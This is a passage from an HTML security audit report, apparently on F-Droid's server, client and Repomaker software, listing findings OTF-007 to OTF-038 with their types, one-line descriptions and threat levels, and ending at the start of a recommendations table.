</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py" style="color: #e2632a;">OTF-007</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The linkify function of DescriptionFormatter in fdroidserver metadata.py allows for injection of javascript into the description of packages.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f33-bluetoothserver-java-request-uri-included-in-response" style="color: #e2632a;">OTF-008</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>html/JavaScript Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>BluetoothServer.java: Request URI Included in Response
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f39-trustonfirstuse-tofu-usage" style="color: #e2632a;">OTF-009</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unverified trust</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Applicatioin uses TrustOnFirstUse (TOFU) potentially using unverified signing certificate.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f49--fdroid-client-exploiting-nearby-swap-feature-to-show-malicious-prompt-to-users-or-redirect-to-malicious-sites" style="color: #e2632a;">OTF-010</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious Use of Feature</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The request to http:https://[client IP]:8888/request-swap is vulnerable as it can be sent by any user, to the client's device. This can be used to show malicious messages and also redirect users.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>High</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><a name="summaryTableThreatLevelModerate"></a><div><a href="#f12-weak-regexps-filtering-xss-and-unwanted-html-tags-in-fdroidserver-lint-py" style="color: #e2632a;">OTF-011</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Sanity checks in fdroidserver lint are easily evaded and allow injection of javascript code in descriptions of apps.</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f13-key-alias-collisions-can-lead-to-dos-of-publishing-in-fdroidserver" style="color: #e2632a;">OTF-012</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>By submitting an app to fdroid with a crafted appid it is possible to deny the publishing of new apps to fdroid.</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py" style="color: #e2632a;">OTF-013</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
Maliciously crafted images can lead to resource exhaustion in fdroidserver.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py" style="color: #e2632a;">OTF-014</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
  Insecure usage of temporary files can allow an attacker to cause a Denial of Service by linking to an important file and have it overwritten.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f20-parsing-untrusted-xml-data-in-fdroidserver" style="color: #e2632a;">OTF-015</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Denial of Service</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>XML file parsing can be used to exhaust resources (RAM) when entity parsing is abused for the Billion Laughs and Quadratic Blowup attacks. In fdroidserver there is a couple of places where such can happen.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f30-downloader-download-file-type-and-size-are-not-verified" style="color: #e2632a;">OTF-016</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Arbitrary file download</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>  Download File Type and Size Are Not Verified  </div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection" style="color: #e2632a;">OTF-017</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure communication</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    Insecure RFComm Socket Is Used for Bluetooth Connection - BluetoothClient.java
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection" style="color: #e2632a;">OTF-018</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure communication</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    Insecure RFComm Socket Is Used for Bluetooth Connection - BluetoothServer.java
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f35-potential-sql-injection" style="color: #e2632a;">OTF-019</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SQL Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    Concatenation of strings, some of which are under attacker c.ontrol, is used to form DB queries.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f41-app-uses-data-from-clipboard" style="color: #e2632a;">OTF-020</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>URI redirect</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    App Uses Data From Clipboard for external resource link.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f43-file-deleted-unconditionally" style="color: #e2632a;">OTF-021</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>File deletion</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    The application deletes specified file unconditionally if it exists.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f44-secure-temp-file-usage-recommended" style="color: #e2632a;">OTF-022</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insecure temp file</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    nanohttpd.java uses insecure temp files
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f46--fdroidclient-app-is-signed-with-sha1withrsa-known-to-have-collision-issues" style="color: #e2632a;">OTF-023</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cryptography</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The application was found to be signed with a SHA1withRSA, which is known to have collision issues.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f47--fdroidclient-raw-sql-query-executions" style="color: #e2632a;">OTF-024</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SQL Injection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>App uses and executes raw SQL query. An untrusted user input in raw SQL queries can lead to SQL Injection attacks.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f48--fdroid-client-snooping-in-between-clients-in-nearby-swap-" style="color: #e2632a;">OTF-025</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious Use of Feature</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>The application's feature Nearby Swap, allows a third person to snoop into the communication. And download files from either of the two user's device, without their permission.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f52--fdroid-client-insecure-implementation-of-ssl" style="color: #e2632a;">OTF-026</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Transport Layer Security</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Trusting all the certificates or accepting self-signed certificates is a critical Security Hole. This application is vulnerable to MITM attacks.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues" style="color: #e2632a;">OTF-027</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Cryptography</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>SHA1withRSA, which is known to have collision issues, has been used to sign the application package.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Moderate</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><a name="summaryTableThreatLevelLow"></a><div><a href="#f1-tabnabbing-in-repomaker" style="color: #e2632a;">OTF-028</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Tabnabbing</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious target site opened from repomaker can manipulate the page that opened it. </div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f9-repomaker-apk-_def_get_type-allows-for-mime-type-mismatches" style="color: #e2632a;">OTF-029</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Malicious File Upload</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Insufficient checking of file types can lead to upload of malicious code.</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f10-unsafe-html-rendering-of-arbitrary-input" style="color: #e2632a;">OTF-030</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unsafe use of the DatalistTextInput can lead to javascript injection in Repomaker. However this widget is currently only used to select predefined list of languages. However if in the future this widget is used to render unsanitized user input it can be easily exploited.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f16-dangerous-deserialization-using-python-pickle-in-fdroidserver-update-py" style="color: #e2632a;">OTF-031</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Dangerous Function</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
 The dangerous python module pickle is being used to store and load a cache. On its own this is not exploitable, but when an attacker has can write files, then this can be escalated into a code execution vulnerability.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f19-starting-a-process-with-a-partial-executable-path" style="color: #e2632a;">OTF-032</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Execution without path</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
  All external programs that are called by fdroidserver depend on the correct executable to be first found in the $PATH environment variable. If an attacker is able to place their own executable on a path before the legit executable that can lead to adversarial code execution.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f24-maliciously-crafted-appid-code-injection-in-fdroidserver-build-py" style="color: #e2632a;">OTF-033</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Maliciously crafted appids can be used for code injection. However in this case the code injection is happening in the build VM, where other attacker controlled code is executed willingly.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f34-bluetootheserver-java-file-in-response-without-size-of-type-check" style="color: #e2632a;">OTF-034</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Arbitrary file in response</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    BluetootheServer.java: File included in Response Without Size or Type Check
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f36-no-mechanism-to-remove-root-ca-keys" style="color: #e2632a;">OTF-035</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Hardcoded keys</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    No Mechanism to Remove hardcoded Root CA Keys
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f37-use-of-rot13-and-base64-encoding" style="color: #e2632a;">OTF-036</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Weak data protection</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    Use of ROT13 and Base64 Encoding
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f38-untrusted-external-links" style="color: #e2632a;">OTF-037</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Unverified remote resources</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    External links used without validation
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f42-stronger-regular-expression-recommended" style="color: #e2632a;">OTF-038</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Weak regular expression</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>
    Regular expression used for filtering file name entries in zipsigner appears to be permissive.
</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Low</div></td></tr></tbody></table></div>

      </div>
      <a name="recommendationSummary"></a><div style="margin-bottom: 1.3cm;">
         <div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; margin-top: 0.4cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>1.7</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">Summary of Recommendations</div></td></tr></table></div>
         <div><table style="margin-bottom: 1.3cm; border-color: #444444; border-width: 1pt; border-style: solid;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>ID</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Type</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt; background-color: #e2632a; color: white;" valign="top"><div>Recommendation</div></td></tr><tr style="color: #444444; font-family: Helvetica; font-size: 11pt; background-color: #ededed;"><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div><a href="#f8-evasion-of-bleach-sanitizer-in-repomaker" style="color: #e2632a;">OTF-001</a></div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Code Execution</div></td><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top"><div>Upgrade to a version of Bleach which fixes this bug.</div></td></tr><tr style="color: #444444; font-family: 